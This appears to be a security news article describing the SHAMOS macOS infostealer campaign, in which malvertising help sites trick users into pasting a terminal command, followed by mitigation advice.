Between June and August 2025, cybersecurity researchers detected a highly sophisticated malware campaign targeting macOS users worldwide. This campaign has successfully attempted to compromise over 300 customer environments, leveraging deceptive tactics that exploit unsuspecting users’ trust in common troubleshooting resources.

At the center of this operation is SHAMOS, a dangerous variant of the notorious Atomic macOS Stealer (AMOS). SHAMOS is deployed by the cybercriminal group COOKIE SPIDER, which operates the malware as a service, renting it to other threat actors. This structure allows a wide range of cybercriminals to use SHAMOS without needing to develop their own malware, significantly increasing the reach and impact of the attacks.

New macOS Malware Campaign Targets Users with Deceptive Help Websites

How the Attack Works

The malware campaign begins in a surprisingly simple way: users searching for help online. For example, a user may search for routine macOS troubleshooting commands, such as “macOS flush resolver cache,” in hopes of resolving common network issues. Unfortunately, this innocent search can lead users to promoted malvertising websites specifically designed to distribute SHAMOS.

Websites involved in the campaign, including mac-safer.com and rescue-mac.com, appear legitimate at first glance. They present themselves as technical support resources, offering step-by-step instructions to resolve macOS issues. However, this is a classic case of social engineering, where attackers manipulate users into taking actions that compromise their own systems.

In this scenario, users are guided to execute a one-line terminal command, a seemingly harmless instruction that actually downloads and installs SHAMOS onto their devices. Once installed, the malware can steal sensitive information, potentially giving attackers access to personal credentials, financial data, and other confidential files stored on the system.

The Global Reach of the Campaign

The SHAMOS campaign has not been limited to a single country. CrowdStrike researchers report that it has targeted users in the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy. Interestingly, Russia has been deliberately excluded. This exclusion stems from rules within Russian eCrime forums that prohibit attacks targeting Commonwealth of Independent States (CIS) regions, showing that even cybercriminal networks sometimes operate with regional restrictions.

This broad geographic scope highlights the campaign’s potential impact. Organizations and individual users alike face increased risk, particularly those who regularly seek online help for technical issues without verifying the credibility of the websites they visit.

The Role of Social Engineering

What makes this campaign particularly dangerous is its use of sophisticated social engineering techniques. Attackers don’t rely solely on vulnerabilities in macOS; instead, they manipulate users directly. By offering solutions that seem helpful and technically legitimate, the attackers create a false sense of trust.

Users are presented with instructions that appear to solve their problems, yet these instructions conceal a hidden threat. Executing a single terminal command, as instructed by the malicious site, effectively bypasses macOS’s built-in security mechanisms, allowing SHAMOS to infiltrate the system undetected. This tactic emphasizes the importance of skepticism and verification when following online troubleshooting guides, especially from unfamiliar sources.

Understanding SHAMOS and AMOS

SHAMOS is a variant of Atomic macOS Stealer (AMOS), a well-known malware family designed to target macOS users. AMOS itself has been recognized for its ability to extract sensitive information from infected systems, including login credentials, browser-stored passwords, and potentially even cryptocurrency wallets.

By creating SHAMOS, COOKIE SPIDER has enhanced the capabilities of AMOS while making it available for rent through a malware-as-a-service (MaaS) model. This means that even cybercriminals with limited technical expertise can launch targeted attacks by simply purchasing or renting access to SHAMOS. Such models have become increasingly common in cybercrime, as they lower the barrier to entry and expand the range of potential victims.

Mitigation and Prevention

Given the deceptive nature of this campaign, preventing infection requires vigilance from both individual users and organizations. Key steps include:

  1. Verify the Source of Troubleshooting Advice: Avoid blindly following instructions from websites that appear in search results. Cross-check solutions with official Apple support resources or reputable tech communities.

  2. Be Wary of Terminal Commands: Executing terminal commands from unknown sources can have serious consequences. If unsure, seek guidance from trusted IT professionals.

  3. Keep macOS Updated: Regular updates help patch vulnerabilities that malware might exploit. Although social engineering bypasses some security measures, staying up-to-date reduces overall risk.

  4. Implement Endpoint Protection: Antivirus and endpoint security solutions can detect and block known malware variants, including SHAMOS.

  5. Educate Users: Organizations should train employees on recognizing phishing and social engineering tactics. Awareness is one of the most effective defenses against campaigns that rely on human error.

Implications for macOS Security

This campaign highlights an important truth about modern cybersecurity: even systems perceived as secure are not immune to attacks. macOS has traditionally been seen as less targeted than Windows, but malware campaigns like SHAMOS demonstrate that attackers are increasingly focusing on Apple devices.

The SHAMOS campaign also underscores the growing sophistication of cybercriminal networks. By combining malware-as-a-service models with advanced social engineering tactics, groups like COOKIE SPIDER can reach a global audience while maintaining operational security and anonymity.

For businesses and individuals alike, this serves as a reminder that online safety depends not only on technology but also on informed behavior. Blindly trusting search results, clicking on promoted links, or executing commands without verification can have severe consequences.

Conclusion

Between June and August 2025, the emergence of SHAMOS represents a major threat to macOS users worldwide. By exploiting users’ trust in online help resources, COOKIE SPIDER has deployed a sophisticated malware campaign capable of stealing sensitive data and compromising systems across multiple countries.

The campaign is a stark example of the effectiveness of social engineering in modern cybercrime. Users and organizations must remain vigilant, verify sources of technical guidance, and employ comprehensive security measures to reduce the risk of infection. As cybercriminals continue to evolve their tactics, awareness and education remain the most powerful tools for safeguarding digital environments.

In a world where even the simplest online search can become a threat, understanding the methods and motives behind campaigns like SHAMOS is essential. By staying informed, verifying instructions, and implementing robust security practices, macOS users can protect themselves from falling victim to this insidious malware campaign.